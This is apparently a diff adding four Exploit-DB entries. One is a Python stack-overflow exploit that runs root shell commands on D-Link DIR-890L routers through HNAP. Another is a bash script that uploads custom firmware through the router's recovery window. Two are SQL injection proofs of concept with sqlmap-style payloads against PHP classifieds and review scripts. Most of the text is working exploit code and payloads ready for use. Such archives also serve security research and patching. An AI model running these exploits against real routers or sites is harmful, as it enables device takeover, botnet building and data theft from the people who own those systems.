platforms/hardware/webapps/42730.py

@@ -0,0 +1,25 @@
+# Due to error in hnap protocol implementation we can overflow stack and execute any sh commands under root priviliges.
+# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin
+# E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/hnap.py
+
+import requests as rq
+import struct
+
+IP = "192.168.0.1"
+PORT = "80"
+# Can differ in different version of routers and versions of firmware
+# SYSTEM_ADDRESS = 0x1B570 # DIR-890L_REVA_FIRMWARE_PATCH_v1.11B02.BETA01
+SYSTEM_ADDRESS = 0x1B50C	# DIR-890L_REVA_FIRMWARE_1.10.B07 
+
+def _str(address):
+    return struct.pack("<I", address) if address > 0 else struct.pack("<i", address)
+
+url = 'http://{ip}:{port}/HNAP1/'.format(ip=IP, port=PORT)
+
+headers_text = {
+    'SOAPACTION' : 'http://purenetworks.com/HNAP1/Login',
+    'CONTENT-TYPE' : 'text/html'
+}
+payload = b"echo 1 > /tmp/hacked;"
+
+print(rq.post(url, data=b"<Action>" + payload + b"A" * (0x400 - len(payload)) + _str(-1) + b"C" * 0x14 + _str(SYSTEM_ADDRESS)[0:3] + b"</Action>", headers=headers_text).text)

platforms/hardware/webapps/42731.sh

@@ -0,0 +1,20 @@
+#!/bin/bash
+
+# If you have access to an ethernet port you can upload custom firmware to a device because system recovery service is started and available for a few seconds after restart.
+# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin
+# E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/update.sh
+
+FIRMWARE="firmware.bin"
+IP="192.168.0.1"
+while true; do
+	T=$(($RANDOM + ($RANDOM % 2) * 32768))
+	STATUS=`wget -t 1 --no-cache -T 0.2 -O - http://$IP/?_=$T 2>/dev/null`
+	if [[ $STATUS == *"<title>Provided by D-Link</title>"* ]]; then
+		echo "Uploading..."
+		curl -F "data=@$FIRMWARE" --connect-timeout 99999 -m 99999 --output /dev/null http://$IP/f2.htm
+		break
+	elif [[ $STATUS == *"<title>D-LINK</title>"* ]]; then
+		echo "Rebooting..."
+		echo -n -e '\x00\x01\x00\x01EXEC REBOOT SYSTEMaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' | timeout 1s nc -u $IP 19541
+	fi
+done

platforms/php/webapps/42727.txt

@@ -0,0 +1,32 @@
+# Exploit Title: XYZ Auto Classifieds v1.0 - SQL Injection
+# Date: 2017-09-12
+# Exploit Author: 8bitsec
+# Vendor Homepage: http://xyzscripts.com/
+# Software Link: https://xyzscripts.com/php-scripts/xyz-auto-classifieds/details
+# Version: 1.0
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-12
+
+Product & Service Introduction:
+===============================
+XYZ Auto Classifieds is a simple and robust PHP + MySQL based auto classifieds script with all options required to start your own auto classifieds site like cars.com.
+
+Technical Details & Description:
+================================
+
+SQL injection on [view] URI parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+http://localhost/[path]/xyz-auto-classifieds/item/view/13 and sleep(5)
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]

platforms/php/webapps/42728.txt

@@ -0,0 +1,41 @@
+# Exploit Title: Consumer Review Script v1.0 - SQL Injection
+# Date: 2017-09-12
+# Exploit Author: 8bitsec
+# Vendor Homepage: http://www.phpscriptsmall.com/product/consumer-review-script/
+# Software Link: http://www.phpscriptsmall.com/product/consumer-review-script/
+# Version: 1.0
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-12
+
+Product & Service Introduction:
+===============================
+Consumer Review Script
+
+Technical Details & Description:
+================================
+
+SQL injection on [idvalue] URI parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+http://localhost/[path]/review-details.php?idvalue=9 and sleep(5)
+
+Parameter: idvalue (GET)
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: idvalue=90 AND (SELECT 5020 FROM(SELECT COUNT(*),CONCAT(0x71716b6a71,(SELECT (ELT(5020=5020,1))),0x717a627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: idvalue=90 AND SLEEP(5)
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]